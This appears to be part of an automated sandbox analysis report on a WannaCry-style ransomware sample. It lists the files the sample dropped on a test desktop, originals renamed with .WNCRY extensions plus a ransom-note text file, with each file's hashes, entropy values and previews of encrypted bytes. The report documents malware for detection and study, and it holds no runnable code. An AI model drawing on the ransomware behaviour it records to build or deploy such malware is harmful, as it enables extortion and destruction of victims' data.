                                Preview:WANACRY!....p..^.t5.t@..@_.....O..~.b.L....i...JOl..*D.......%...... ....V....T.(...oN.g[......2-..G{r....@u.......S...'....Z.0.%..../9P...|fU.8v*..z2.(...R.c.D.:.6|..f.^dJ.U^.......a.8}f...].J,...0.......F....l.......~.S.+/...{..z...F.+.ac....).....4..u...............V..=5...T./%.8.....n.F.<^..y..'...h\.9...Q.ut..-y.Y..Gw.....h.Y3`......|....pW.p.EK..Q.4.F.*g`Z7..mX).cS.3y.....\+.).3H.....@..tD..w.z..p...R......j.-.,..B..*T..."..q...L.._H..F..8...q.z./......D&.8..3.'..=*.Cw.1rZvZ....F.g?.L!\ ...g8.XbM.P.Z...M.......0.:.~M?.....e....$..i+.^z.8.....o......_..6..;..Z....,np...h..n...9.......^[.[...9......!.M.....m..:....%.#..U..7W..`J....{C.W..i...f..ou.'.Tgog...^- ..w..'...X..T ........_.&.M..!.,.{~ls.S;....Nc...\...C(..|&.w...+..e....}...ZA..f....A.=....[...U(d..a..t>......1.^J..YH.@.../q..............I.c..|.Mv...?F..s.....z.c.?-N..(.J..............q1.... ..\+,.W.<.Bu.-G]"..M..)i|...Cd......cv.....P....Oh.R..XS.L..I........~.ij..._..}..

                                C:\Users\user\Desktop\KLIZUSIQEN.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8513655148042405
                                Encrypted:false
                                SSDEEP:24:bkVAplgZkxMWd1FCVuVQLDKlXEmfx4CyOptAY/FcOHMYUtqll7XzqYJ4HT0fwxXp:bkAlJxMaPCilJx4ZOpmwcYiqlNzqaoY+
                                MD5:29103ADBB9F0BC61F9D18503A697F59C
                                SHA1:59EF2D4079378F54E0760B916ADBF35D37208D94
                                SHA-256:299EF53E107792794618C4E380107FF1A45EA52CFABBCCD88F937876959A523B
                                SHA-512:710DD51A1727D24BDF7E29A453CABDE874CE67686CD3CB88FEDB4A9772C2A96D7C5648056AF09214BB76B13F5E5C836052AC825FB28AAEA8001085F469F9F030
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....p..^.t5.t@..@_.....O..~.b.L....i...JOl..*D.......%...... ....V....T.(...oN.g[......2-..G{r....@u.......S...'....Z.0.%..../9P...|fU.8v*..z2.(...R.c.D.:.6|..f.^dJ.U^.......a.8}f...].J,...0.......F....l.......~.S.+/...{..z...F.+.ac....).....4..u...............V..=5...T./%.8.....n.F.<^..y..'...h\.9...Q.ut..-y.Y..Gw.....h.Y3`......|....pW.p.EK..Q.4.F.*g`Z7..mX).cS.3y.....\+.).3H.....@..tD..w.z..p...R......j.-.,..B..*T..."..q...L.._H..F..8...q.z./......D&.8..3.'..=*.Cw.1rZvZ....F.g?.L!\ ...g8.XbM.P.Z...M.......0.:.~M?.....e....$..i+.^z.8.....o......_..6..;..Z....,np...h..n...9.......^[.[...9......!.M.....m..:....%.#..U..7W..`J....{C.W..i...f..ou.'.Tgog...^- ..w..'...X..T ........_.&.M..!.,.{~ls.S;....Nc...\...C(..|&.w...+..e....}...ZA..f....A.=....[...U(d..a..t>......1.^J..YH.@.../q..............I.c..|.Mv...?F..s.....z.c.?-N..(.J..............q1.... ..\+,.W.<.Bu.-G]"..M..)i|...Cd......cv.....P....Oh.R..XS.L..I........~.ij..._..}..

                                C:\Users\user\Desktop\NVWZAPQSQL.png

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.829968915408538
                                Encrypted:false
                                SSDEEP:24:54hJCMEUtD6JAVAY6vyII11yQJQpWKgQS+UXKk:5T9giBtyIIXylnWKk
                                MD5:27A49D9ECC46648125A673BDF43543E7
                                SHA1:47D8EBA2EDBB3C3EFB9C49CDB8D070A8CDB34C96
                                SHA-256:A952D25E654BC37E5CB0233D0C134C52CB1A4EF3F547B3BE2F313FA993C25C5A
                                SHA-512:B899D2B70327D81BA19E056756F247AE3A0945DBBE9E2051F75820E8CC3757CDB6876389D1863B4698A3AD80B52B155225002A35968C6B69A7F2E5682B1AF8AD
                                Malicious:false
                                Reputation:unknown
                                Preview:\.)..Y..p.S.EuN....3...h,#K.}bJ.7)%.Y^H.|.y.d....4}..7.o..^.....=..p.5%..`.q.z.g......?s.&X.._.QT._..`.T..o.X.dC....H.[.;p.-..\.K...Xu.1XGP=.t.H.]...Ca...a.=.s..o)..e.K....J.?-.A...x/..y.......O.bw....{...j..*.v..L..g....>Q\sZ.....G_.6.....~@...Y..~(.'..4.......6T.1..(..e...z.J.eGp...f.FQ.h.p.n....[.6..`.)...L..*o:m;..^w%J....-../$.....`.....-.K....<`^F}...Q(.e%yPA.0a.....s.>..p.<.q.L...x....."...#...9yM_..j:%.6...X.'74?....vPu"i"...k.@.....A.v.2(a......V.|..`.._....n.m......-i....d:..1....+2j}.4+.).?_....3....>nJ5..?..^...>..n...I.8..;.y.R..!=.|UL3J.#{.x.$..$/K.rZ.^..d.uT.D. }..0.L..x.<Z..f.DQ..c...l..$J..8....H:.3. .....{<U......pV.n..k\=.......A..h:.:.*w.?...i+..7..uM.. 7..:K.r.w.E...M.......n.G.4.*.t".......fk.i.[n...%[.7V.?..HsL./..f.me3.$|.Cv.z..)3.zw1&..........Y..)...}s-..t..8...!.l.S....1.eTvM=;...'....#w..K.".e.|.]O!rS.T..0$9...O.;..N.-.`....K.1Zv..t..7R@L....`..I.C...Yb9*...,".gBy.D...M..m.....f'.c..Jg..G.].>..d.:..x.D.\......,>...)..

                                C:\Users\user\Desktop\NVWZAPQSQL.png.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.84313455810191
                                Encrypted:false
                                SSDEEP:24:bkU8XSKuOkD0aIAMSPdecLKlxeVMW7xOwjZAOjG5QcxiCwZoFC:bkxCKM0ahvwRLWswdAOjG5Qz
                                MD5:4751E0190F835BFFA8946BAF61FCE8FE
                                SHA1:6C275C9A0A13273542D2780CC312FF2AE92C3B73
                                SHA-256:F6E752EDBA3EA3742D9166BA481767F27CAFE2D62130707FAE0FE7B9EF2621BE
                                SHA-512:C2D400CECB8DEE98FB6821F68DC1D2A7E4F2E760D146F04DDC87E36C178BF9BBFC303B5E0BCEDB64171699F142F6D90682BCC5D6917CCDBD92DD7F2E81D44186
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....z...0...3H..Hf]E.la....h../...u...e..0...o.t.....r...,.`..(P%..'(s3...k..9.%?c....@..a.~2...r...g;..:.Gw..$../e.4y@..:)..Uk.M#..{k.....%T...}-...>..j...Y..."RV0....o......... .T.r .-.i..u.J}...A.'i..?.9.)!4).5(x..vl.x."4.Px.Ob`#..P.:84|.................B..94.....l#.....'M..n.zu."cLU.}....4:...!z._2.......8._.24.d#.S..+9Rs..$.h.5Xr.."...q1M,...8....&..4t.......]..i..A.T.d8#$..{..5.....U..s,X.....eOUd.A>HM...%..y..v...Q..+....#..G.+b........y..g...!..[...1j<A......S2.......R.h.w.........]e..._m.)]y.pA84.+OzC.^A.f.@.n...G..xN/^.1>|......!...*.8F.B&1.<.......a.y....._..W].J..5[..$..5B.....go,*..Pb...f&......JQ_.w2...-.4&.5.r.:.%x..6OD;.jz....M^.b....=.t......>>@.......@bo.[:X..?.'.,k'K...Ho....2dbf.....P.M)..I....&&..G.y-2......E..Z-....J.,...pVrv#O +~!.&).M~.pRH+....n.*...E....<.z...... f.s.....@4.;K..;....\s{...d.t.L.j ......5...1.... ..N...F.1.oH..~....K.2..."s..:....@[..).VaU..H|.....fJ.Y.8.M..R=...5o.I..w.u'....c..W._.....+...?...B.v

                                C:\Users\user\Desktop\NVWZAPQSQL.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.84313455810191
                                Encrypted:false
                                SSDEEP:24:bkU8XSKuOkD0aIAMSPdecLKlxeVMW7xOwjZAOjG5QcxiCwZoFC:bkxCKM0ahvwRLWswdAOjG5Qz
                                MD5:4751E0190F835BFFA8946BAF61FCE8FE
                                SHA1:6C275C9A0A13273542D2780CC312FF2AE92C3B73
                                SHA-256:F6E752EDBA3EA3742D9166BA481767F27CAFE2D62130707FAE0FE7B9EF2621BE
                                SHA-512:C2D400CECB8DEE98FB6821F68DC1D2A7E4F2E760D146F04DDC87E36C178BF9BBFC303B5E0BCEDB64171699F142F6D90682BCC5D6917CCDBD92DD7F2E81D44186
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....z...0...3H..Hf]E.la....h../...u...e..0...o.t.....r...,.`..(P%..'(s3...k..9.%?c....@..a.~2...r...g;..:.Gw..$../e.4y@..:)..Uk.M#..{k.....%T...}-...>..j...Y..."RV0....o......... .T.r .-.i..u.J}...A.'i..?.9.)!4).5(x..vl.x."4.Px.Ob`#..P.:84|.................B..94.....l#.....'M..n.zu."cLU.}....4:...!z._2.......8._.24.d#.S..+9Rs..$.h.5Xr.."...q1M,...8....&..4t.......]..i..A.T.d8#$..{..5.....U..s,X.....eOUd.A>HM...%..y..v...Q..+....#..G.+b........y..g...!..[...1j<A......S2.......R.h.w.........]e..._m.)]y.pA84.+OzC.^A.f.@.n...G..xN/^.1>|......!...*.8F.B&1.<.......a.y....._..W].J..5[..$..5B.....go,*..Pb...f&......JQ_.w2...-.4&.5.r.:.%x..6OD;.jz....M^.b....=.t......>>@.......@bo.[:X..?.'.,k'K...Ho....2dbf.....P.M)..I....&&..G.y-2......E..Z-....J.,...pVrv#O +~!.&).M~.pRH+....n.*...E....<.z...... f.s.....@4.;K..;....\s{...d.t.L.j ......5...1.... ..N...F.1.oH..~....K.2..."s..:....@[..).VaU..H|.....fJ.Y.8.M..R=...5o.I..w.u'....c..W._.....+...?...B.v

                                C:\Users\user\Desktop\NYMMPCEIMA.png

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.807707754121254
                                Encrypted:false
                                SSDEEP:24:bWpZTXI3gX2S0HX6GRc7Q2inoectN5VLxnMlFu4:SpZTIgXB0HXHRQQ28pSLxMvu4
                                MD5:A3D5C949D65B462B8876FFE5B4A7D6F3
                                SHA1:AE3E5AC0C39269E4589A02C96519C088CC1EAD25
                                SHA-256:0820C12E14C803792CC8BE1C62190ED3D98E27CDFA14054C193F45A118D62721
                                SHA-512:2FACE32C17BE4AE667B7816F9F865433C658329BFD45AE822A318C48D8B1CBE2D0CF4C245783F34D3FB8D12B77DFA1498DFF08D828D1D15A548317D74DD162AB
                                Malicious:false
                                Reputation:unknown
                                Preview:.)9.j.g..X.y.m/..Fe.W.....]...V.J\....T~#C[V.=..D.+.J.L......<Th.ib.h-.......f-.hv2....o.Xm.X<..^.f;D8..J.].(2.(..Je..6.*.Zh,.<...h.....' .ugL..\..T.&Wh.\..n.@...DB&.xR..4.c.....T..,$/..mP..HI.6..^.......]:.t....;rUG.DC...P...).e.r.J.9..E.10.O. .eZ.+i..Dh........=d+...Ea..>....">'.G.."...r.}..J~.Dn..A;...P...&....@E,..qC.....b%.&..r6.:HA..yN.....g...O..%...Z.N...:d........;.f....]...ST....A..0B..'....P71..}Z...v!N.%...4.....NA..<.:e.brT.....XTV..B]..[.....b..].b........p.+~..DC......kf.BI..........pyW...V1..#...Te@.O.4.....*.\b|9-....UZ...A.."`x.T#.]..o$....%_I.*...A.n..-....}.Mc..&[.......~...H......S+.q&k.~".)1t..H.<$~.vF..Dl.!.l...$..#J.....V.U.&x......ZXk.W..f.?..Z..*...R.......9..:...G.@......E.{q.J\j.+...<.e..B.v.=..u..MH.v..9*.....~.J..t.~...J.b,N..lBTF{.._.`....u...7d..h\..I...#K....1.m..V.....P........:p2M..MF...9.o...a..<....G.....Mq..N.t..f......*P. ......2v...|.z....m.S...#i..H.=e#oW*ul.KM... 9.$*U.x....x.../E..pmA.

                                C:\Users\user\Desktop\NYMMPCEIMA.png.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8394091260184995
                                Encrypted:false
                                SSDEEP:24:bkwMibKHNeV9ZdykGEkdUfxgc6y15+JmzEfAeLfgMP7pRgEJhxyHCznhthgjxe:bkwMh+ZdykGP1Ty19z+XfrvgEJXishqe
                                MD5:CF7AEFD2C19DE645A1613167F5F3521F
                                SHA1:2A0E079732C57A3D6B64D655B30B8B5924DFEAC8
                                SHA-256:E094071E48BCC25382C2658C78F912C8B05F8F723CAC119D0A47E41A2C5465F2
                                SHA-512:7D25F58B7A36C134C54E4276DF2711785D81615E304D4F9691471271290D46E440CA7A27F4234FF7501350B49BCFDC96A8F16FC16566557C136879ACB06D113C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....}{....qoa.]o.....e......j..5\.....4.2T....;.I.."z.....A......s.k.1...+..Egk.bY:.l.v.W1....tV..Rkv9V....y\X...0.. }..g..#,r..W.^..:..b........54..v..:.....`...x.....ud0..Hv.....N......zd'.Vl.~.~.$].D.....:.s....MH.........<i(.c.....T..RL/9..............@0g...,...,(....mh.Q..4x..?.Y.;zs..d.v.8.<..YR.9.\.R..A*c.A`... %.50..{e<...,X^..|.."d.j.....3..._..._.].... lX..Z...Jx....5....]d..F..E..<V.@.\|7K.m...e..Z^[ .:H...8a.N.ZY....M.Cr.c/..e..z6z.......GQiw.b...& ...7/....7..<U.[i.c.o.#..t.y......~.q..M\..V.T6..55.a.CJV..2....{^..K....DVU..n.......Q...(...:T.,fw.0._r.kEp..r....X......g..T...e..)Q@S.........!.....;....._..... .V8...<.A(..@..@c.ST7.....@.O[m....[..T.?..P...~....Ji._Nl..Z.......h...9v@......H..f..... ...4.A..}.UbvV.....Bi.S.Y..2....U..e.dba..^!..%."I!.nN....C.B2.97....!e]...i..?."|.S;...FW..g?..D...F..Pa..8..O...Mf....e.t}-I...yW..{....B.J....h.ZA.(a..O.....1..p......P<(.......HP%..J..s.kjO....C....:...0e~.'6.Iv

                                C:\Users\user\Desktop\NYMMPCEIMA.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8394091260184995
                                Encrypted:false
                                SSDEEP:24:bkwMibKHNeV9ZdykGEkdUfxgc6y15+JmzEfAeLfgMP7pRgEJhxyHCznhthgjxe:bkwMh+ZdykGP1Ty19z+XfrvgEJXishqe
                                MD5:CF7AEFD2C19DE645A1613167F5F3521F
                                SHA1:2A0E079732C57A3D6B64D655B30B8B5924DFEAC8
                                SHA-256:E094071E48BCC25382C2658C78F912C8B05F8F723CAC119D0A47E41A2C5465F2
                                SHA-512:7D25F58B7A36C134C54E4276DF2711785D81615E304D4F9691471271290D46E440CA7A27F4234FF7501350B49BCFDC96A8F16FC16566557C136879ACB06D113C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....}{....qoa.]o.....e......j..5\.....4.2T....;.I.."z.....A......s.k.1...+..Egk.bY:.l.v.W1....tV..Rkv9V....y\X...0.. }..g..#,r..W.^..:..b........54..v..:.....`...x.....ud0..Hv.....N......zd'.Vl.~.~.$].D.....:.s....MH.........<i(.c.....T..RL/9..............@0g...,...,(....mh.Q..4x..?.Y.;zs..d.v.8.<..YR.9.\.R..A*c.A`... %.50..{e<...,X^..|.."d.j.....3..._..._.].... lX..Z...Jx....5....]d..F..E..<V.@.\|7K.m...e..Z^[ .:H...8a.N.ZY....M.Cr.c/..e..z6z.......GQiw.b...& ...7/....7..<U.[i.c.o.#..t.y......~.q..M\..V.T6..55.a.CJV..2....{^..K....DVU..n.......Q...(...:T.,fw.0._r.kEp..r....X......g..T...e..)Q@S.........!.....;....._..... .V8...<.A(..@..@c.ST7.....@.O[m....[..T.?..P...~....Ji._Nl..Z.......h...9v@......H..f..... ...4.A..}.UbvV.....Bi.S.Y..2....U..e.dba..^!..%."I!.nN....C.B2.97....!e]...i..?."|.S;...FW..g?..D...F..Pa..8..O...Mf....e.t}-I...yW..{....B.J....h.ZA.(a..O.....1..p......P<(.......HP%..J..s.kjO....C....:...0e~.'6.Iv

                                C:\Users\user\Desktop\PALRGUCVEH.pdf

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.796805658692537
                                Encrypted:false
                                SSDEEP:24:RObUjgDAZr44p48g4DTrhsYRQ4QZEXQrBzsItyBY8V3zF4DoldPoPijf:ROb6T48gm523WXCzJtyjdvlmPi7
                                MD5:4947EDCF59AA746A1CD542BD88B3A7E0
                                SHA1:1E6AC68900C039D09271D1CBD656F0A5C8A2A394
                                SHA-256:5128C163E2072D84C1382236D9A859B2D1A920B01F1BFB1FF842DB81FDF324CD
                                SHA-512:C265B0851E6AFF4CFBB311FED68D25DA3AC59559D3DE3EA9A5B39DA5312F9829577469F01FC7349A5E451A7390767A7FE26BB398600EDC6E603038DD8C53B13F
                                Malicious:false
                                Reputation:unknown
                                Preview:A)....O..B.7Z.wYq8o.B-.&.......o.$}.._.S,.D.~....oN.&..u...^.b....B.v.H.._......"ba...o.....%.v.N.....*F.S(.6&..fAB.>...w.N8s.g.u./?...@.a..+af.L.A.9Kp....!.!.%3.s.....r.D3J..f$.a!T/.)..4.qi....@..{PA:|9\.=:.rNl.K0w...w.3...~9"v./....3..II...N....!W..3.o.Y=A.R...w@"c..HK.o...t..^.<.<.....W......(..B"...7..12..8%!.N.<:L+..&}.@.x.m.^....i@9N)e../....Z...Zt7..3..ZP).K.g)..x,H..NM.|......8........*.m.\.4..y......(W..G.H......"}...B..&X...`.....>.....)..........[.".ro........V..9./$.k.?...f.b)....l...7...:z_..1..o.....).....vq..40.s...%.."|k4.&._.#....c.....xo..]..a...?...<.7......Q..Q...&...Rq.=...z...e.[..~i.........)..../..q..x2;..[.V.x...;u+....M{.z..T.hjd.gX.`T.......w.......g.."s_.e7h.Btn+..Mt...>..q).)...v..-T.....n.HH..T.}..m......"A!T..^a.K.4.b.jm."..i3........t..Dd..R6..4.e.F..x......b.B..t.,...w..{...~..|..7.$.(.{I..........1[a.l.Z..Zw9..7/D.}y...m..x.a?...f.^..l.....;...,2......4.KA.H..-.|#......,.....iJ...VY.$.g..O.y..X...T1N..

                                C:\Users\user\Desktop\PALRGUCVEH.pdf.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.844898851480916
                                Encrypted:false
                                SSDEEP:24:bk7STcijTyPlpR2T8BJlxw830bGf5eJcYiEnTCq8CXJ8rMSZHopKuB46UC+oiP0:bk7fizy/w83LRC+oXhUgp+ol
                                MD5:393522B2335A208E7D699CE7638E4FC0
                                SHA1:167B9ACA3653B5146388477CF8262E386E12EB7B
                                SHA-256:84352DF9CF6839E4CF52188AB26B9BB819E307423BD2E0344F511E3982541BAA
                                SHA-512:0DF187E6727BE2331776EA102F743CB8A530FB2562E3D785FF8CA9CFAF315E8075B2E2167B2E0316F64620D636D6D971B9D4C065BF3616A3CFBA1669B12E3012
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....G.3.....7.R.&F....Z...%^U..f..v.!...|.I.A..$s...Z..(...4.@..5./q..B..(......I.b..NK..&..U.v%?..`....ZNN..,kP}.J%...\...V......i.eU.\....7.s.N..nS.../..4..h.2}......}.?.....V;..f.~.F...9..s.G.9...O..?.........<.mr.d6..>.......$.T..L~.P].ic...............g.w).|..~.d. 9......p..%.W]`....owZ<.,7.z....9.`.v......e..J\.|;M.=._7lW{G.T..?!L.6.M..%5^$.a..0...Ns.(2n...X....H..].\i."..U...ya6.q.r.G.....l=..m,..G.j......_..Y.=Y....TS.6..s.C..*.lb.&..Z.,....p..lt\~..R<...4t*......ED........~.y....9...........|:..`|.. .R..KRJ'B....z.....a*b.4.<.r;hZ...P.C...7.P...e..{-.v.eh.+..I"....~o.(.8.Lf...<.i.....@..'...n}.*.,(.....Y5.. .X.Jy.D.VX.....Y...8i6<.....|##......$.....7P.\.."..HC..3c/.b.{.......3.HM.\<f_.!.q......K.#.Fs.x.ut.j.f...}.5.dJ...%....W$.......\..=...{q6*..._...(.....O?...'4....wc..q.&....3_..HN.=.=.>.7.4_.;z._.{.G.W..)u^ ..............k.P8....U.#....}..;.9Q.r~.....E#.b....[...0...jW..Uf.w=#.....".l#...;n.(.(...8.^.<..rc..m;l..>..V

                                C:\Users\user\Desktop\PALRGUCVEH.pdf.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.844898851480916
                                Encrypted:false
                                SSDEEP:24:bk7STcijTyPlpR2T8BJlxw830bGf5eJcYiEnTCq8CXJ8rMSZHopKuB46UC+oiP0:bk7fizy/w83LRC+oXhUgp+ol
                                MD5:393522B2335A208E7D699CE7638E4FC0
                                SHA1:167B9ACA3653B5146388477CF8262E386E12EB7B
                                SHA-256:84352DF9CF6839E4CF52188AB26B9BB819E307423BD2E0344F511E3982541BAA
                                SHA-512:0DF187E6727BE2331776EA102F743CB8A530FB2562E3D785FF8CA9CFAF315E8075B2E2167B2E0316F64620D636D6D971B9D4C065BF3616A3CFBA1669B12E3012
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....G.3.....7.R.&F....Z...%^U..f..v.!...|.I.A..$s...Z..(...4.@..5./q..B..(......I.b..NK..&..U.v%?..`....ZNN..,kP}.J%...\...V......i.eU.\....7.s.N..nS.../..4..h.2}......}.?.....V;..f.~.F...9..s.G.9...O..?.........<.mr.d6..>.......$.T..L~.P].ic...............g.w).|..~.d. 9......p..%.W]`....owZ<.,7.z....9.`.v......e..J\.|;M.=._7lW{G.T..?!L.6.M..%5^$.a..0...Ns.(2n...X....H..].\i."..U...ya6.q.r.G.....l=..m,..G.j......_..Y.=Y....TS.6..s.C..*.lb.&..Z.,....p..lt\~..R<...4t*......ED........~.y....9...........|:..`|.. .R..KRJ'B....z.....a*b.4.<.r;hZ...P.C...7.P...e..{-.v.eh.+..I"....~o.(.8.Lf...<.i.....@..'...n}.*.,(.....Y5.. .X.Jy.D.VX.....Y...8i6<.....|##......$.....7P.\.."..HC..3c/.b.{.......3.HM.\<f_.!.q......K.#.Fs.x.ut.j.f...}.5.dJ...%....W$.......\..=...{q6*..._...(.....O?...'4....wc..q.&....3_..HN.=.=.>.7.4_.;z._.{.G.W..)u^ ..............k.P8....U.#....}..;.9Q.r~.....E#.b....[...0...jW..Uf.w=#.....".l#...;n.(.(...8.^.<..rc..m;l..>..V

                                C:\Users\user\Desktop\PIVFAGEAAV.docx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.816975207396427
                                Encrypted:false
                                SSDEEP:24:QCJ/LKhCR+TfyDi5hWUYIJ1H/4gqVhRsl+Q8ZV3xXta:DxL+TkKZfgg0gjcta
                                MD5:F7ECD6F0A4F0DC4F6709DB062FF1C1CB
                                SHA1:3922C1DD149179529F42F1EF503F18AECF41406E
                                SHA-256:604F77011900E78218152CF67D86960C20A2F6C8B733CE591FC526A4908ECB86
                                SHA-512:6B7716EED40C70A414AD78EC7900C53B3571706961C1CED115A659475199993AAC0D87213036679C2116F3186FB53D88F0C060D1BF52B4A5D681CBA5BCA158F0
                                Malicious:true
                                Reputation:unknown
                                Preview:....9...'}.].N.O.v6.>!-......`j.Ew.wW/,.F.Z.w......."yoM.)|".....D.+j'...}......D.T&.b...... ...T....5.C.X.......6:.S..2...c..q.8........A..."..*......SD...W,..R.x...G..zw..S..3...N.F~....R....8..4...p...@.....i...... .V.h...k.<.,.N!E.........Po{|._..Ns[i.....}...V...*8%y....@....a..? ..R./....B...?#s.8]........}N.&....fn..).k.K......C..<NJ...W.....~e#.b.....P..."..6.........C..<..g.]..9.UxNM.....j7.e.3a{.v{......^1p./v!.g..7A}.....}....%.s...})..<......2rp.`-...g....7 Y....Y)Sn.."..W........3.............O]....;IHH...t.....p*....V.|M2J...(..<.[?.....?;..V!...8w.G[pHkj!1...&..'.H..)...S....y.0.z^..5U.l.v......|7M........%^.aJ...\a.@N.o..a.......AdU....YI.=...R]{I...-...N...".E..._.JaK!....q..A.j.N..~...{......u..|....qf.fW.y..-.cZ..>...........8.....7U..].Y.OV~..^...I.YQ..Wgs.]...-.......1...k....}^.+./.".e...27.c..h.$~....fw..,-.(WS...F.}t.....".7...p.`.q.w..C..5.....D......6.......o...}..1f.0...!..}Q...1.Y..j..j........f....;K..

                                C:\Users\user\Desktop\PIVFAGEAAV.docx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.842194311026458
                                Encrypted:false
                                SSDEEP:24:bkSc9b15VsGdFff5R4jlA8Ko0HB1vo/GaHuLOO4uhGeIqlIjHtE0:bkdb15Vdd54jlA8Ko0P3nlHbI3NJ
                                MD5:913D38C89EDF4F7DC0C05CEFD1A1FC46
                                SHA1:5DA71EDCD8B3BC8F01F76964B38B87A0EDBFCC0C
                                SHA-256:2BD9981848B21418451EC88086D71BF43F6C5EC93A13E435C92769C97BB44DCD
                                SHA-512:4FD038B950C17591E2923726817E358FABBF77E4CCF5F6BEA7958AB647D537A4DD04D1A041F07B12F26F5259C6783E76E0919CBFFB58DD74ED48327DD50E6E8B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....Az.M.YRM?...".NG.t.M.x.x.c,.A..w.j...!...E..-...j.Io../....CUcf..}..8.....-v).m..6.(O.k. ..ZR...i9.+.."..........>........L.X...... ........97._...tB.@._........w...)...QM.M.......S.4.....mw.`../;<M....dV?kj...Ud...O.'..~#.I.....*8..........E............[.....:..c/o'..y...661.q.k....|.^.....e....u...C.m."En.40.....0.S.B["C./...u.....5..J.x..a...]...$......]..j..e g..h..J/r_[.:..z....Ls.@..4...]-..(....p..^.X...4N..7|r...k.x." ..-BCo.&...9J...J.L......{..z.nq..-z.z.}%s.A.@~...w.&.....|5.mc...!pe.mj..\.....7........-.....:X"...w....9..;.i...D..'...M....0...V.A . .Ub..}X........cy(w.,.+..4......m8..u..A.q.n.Mr.-..X5.6.j.#g.....Z.5.s.C...4....-B\B9...k.............I.\7..}/...V..c....7l....z.q...-.......[&. .w.t.}.....N.u.....x...N!..)....v......\ge"*..)D...I....s.ca.~Y.RJ..~T......dN|j&...m.i.q......ge(.t..5...E.Am.....o..].@.E.x@.U....M..|3.>,...........|Y....i........e_F.<._ma..'0..L...o..J.u.Z.>!.K}...}?s..P..ao.....>*.".`.=...?O..=

                                C:\Users\user\Desktop\PIVFAGEAAV.docx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.842194311026458
                                Encrypted:false
                                SSDEEP:24:bkSc9b15VsGdFff5R4jlA8Ko0HB1vo/GaHuLOO4uhGeIqlIjHtE0:bkdb15Vdd54jlA8Ko0P3nlHbI3NJ
                                MD5:913D38C89EDF4F7DC0C05CEFD1A1FC46
                                SHA1:5DA71EDCD8B3BC8F01F76964B38B87A0EDBFCC0C
                                SHA-256:2BD9981848B21418451EC88086D71BF43F6C5EC93A13E435C92769C97BB44DCD
                                SHA-512:4FD038B950C17591E2923726817E358FABBF77E4CCF5F6BEA7958AB647D537A4DD04D1A041F07B12F26F5259C6783E76E0919CBFFB58DD74ED48327DD50E6E8B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....Az.M.YRM?...".NG.t.M.x.x.c,.A..w.j...!...E..-...j.Io../....CUcf..}..8.....-v).m..6.(O.k. ..ZR...i9.+.."..........>........L.X...... ........97._...tB.@._........w...)...QM.M.......S.4.....mw.`../;<M....dV?kj...Ud...O.'..~#.I.....*8..........E............[.....:..c/o'..y...661.q.k....|.^.....e....u...C.m."En.40.....0.S.B["C./...u.....5..J.x..a...]...$......]..j..e g..h..J/r_[.:..z....Ls.@..4...]-..(....p..^.X...4N..7|r...k.x." ..-BCo.&...9J...J.L......{..z.nq..-z.z.}%s.A.@~...w.&.....|5.mc...!pe.mj..\.....7........-.....:X"...w....9..;.i...D..'...M....0...V.A . .Ub..}X........cy(w.,.+..4......m8..u..A.q.n.Mr.-..X5.6.j.#g.....Z.5.s.C...4....-B\B9...k.............I.\7..}/...V..c....7l....z.q...-.......[&. .w.t.}.....N.u.....x...N!..)....v......\ge"*..)D...I....s.ca.~Y.RJ..~T......dN|j&...m.i.q......ge(.t..5...E.Am.....o..].@.E.x@.U....M..|3.>,...........|Y....i........e_F.<._ma..'0..L...o..J.u.Z.>!.K}...}?s..P..ao.....>*.".`.=...?O..=

                                C:\Users\user\Desktop\PIVFAGEAAV\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
